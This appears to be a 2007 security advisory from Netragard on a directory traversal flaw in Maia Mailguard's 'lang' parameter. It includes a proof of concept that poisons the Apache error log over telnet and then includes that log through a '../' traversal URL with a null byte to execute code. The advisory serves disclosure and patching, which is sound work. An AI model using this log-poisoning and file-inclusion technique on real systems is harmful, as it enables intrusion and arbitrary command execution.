*************************** NETRAGARD ADVISORY ************************ http://www.netragard.com "We make IT Safe" [Advisory Summary] ----------------------------------------------------------------------- Advisory Author : Adriel T. Desautels Advisory ID : NETRAGARD-20070628 Product Name : Maia Mailguard Product Version : <= 1.0.2 (All Platforms) Vendor Name : http://www.miamailguard.com Type of Vulnerability : Directory Traversal / File Read Effort (1-10 where 1 == easy) : 2 Impact : Arbitrary Code Execution Vendor Notified : Yes Patch Released : N/A Discovery Date : 06/10/2007 [POSTING NOTICE] ----------------------------------------------------------------------- If you intend to post this advisory on your web-site you must provide a clickable link back to http://www.netragard.com as the contents of this advisory may be updated without notice. [Product Description] ----------------------------------------------------------------------- "Maia Mailguard is a web-based interface and management system based on the popular amavisd-new e-mail scanner and SpamAssassin. Written in Perl and PHP, Maia Mailguard gives end-users control over how their mail is processed by virus scanners and spam filters, while giving mail administrators the power to configure site-wide defaults and limits." -- http://www.miamailguard.com -- [Technical Summary] ----------------------------------------------------------------------- A Directory Traversal vulnerability exists in the Maia Mailguard Web Application that enables an attacker to execute arbitrary commands on the affected system. [Technical Details] ----------------------------------------------------------------------- Improper input validation on the "lang" variable in Maia Mailguard web application has resulted in a Directory Traversal vulnerability that can be used to execute arbitrary commands on he affected system, or, to read arbitrary files on the affected system. [Proof Of Concept] ----------------------------------------------------------------------- 1-) An attacker can inject code into the httpd-error.log file by connecting to port 80 on the affected system and issuing a "get " command. See example below: the-wretched:~ simon$ telnet maiatest.snosoft.com 80 Trying 10.0.0.128... Connected to maiatest.snosoft.com. Escape character is '^]'. get <pre>> HTTP/1.1 400 Bad Request Date: Wed, 20 Jun 2007 21:31:58 GMT Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/2.8.28 OpenSSL/0.9.7e-p1 Connection: close Content-Type: text/html; charset=iso-8859-1 2-) Once the attacker has injected his code into the log file, the code can be executed by forcing the web application to read the log file. When the log file is read, the code is executed. Below is an example of code execution: the-wretched:~ simon$ wget http://maiatest.snosoft.com/maia/login.php?lang= ../../../../../../../../../../../../../var/log/httpd-error.log%00.txt [Vendor Status] ----------------------------------------------------------------------- Vendor has been notified and has been very quick to respond to and patch this issue. [Vendor Comments] ----------------------------------------------------------------------- "The only addition that I had was that it seems to only affect systems like freebsd... It would be nice to nail that down. It suspect the root security issue is really with the php and filesystem interaction... my patch just simply works around and blocks the root problem. From my developer point of view, I'm asking for one file and the filesystem is giving us something else. That's a serious risk. If we could at least express that concern, I think that would be prudent. Chicken and egg problem, I was kinda waiting on you to post our own ticket, but.... I can add a comment afterwards. OK. Here's our ticket which also references the changeset: http://www.maiamailguard.org/maia/ticket/479 A unified patch may be retrieved from: http://www.maiamailguard.org/ maia/changeset/1184?format=diff&new=1184 David Morton" [Disclaimer] ----------------------http://www.netragard.com------------------------- Netragard, L.L.C. assumes no liability for the use of the information provided in this advisory. This advisory was released in an effort to help the I.T. community protect themselves against a potentially dangerous security hole. This advisory is not an attempt to solicit business.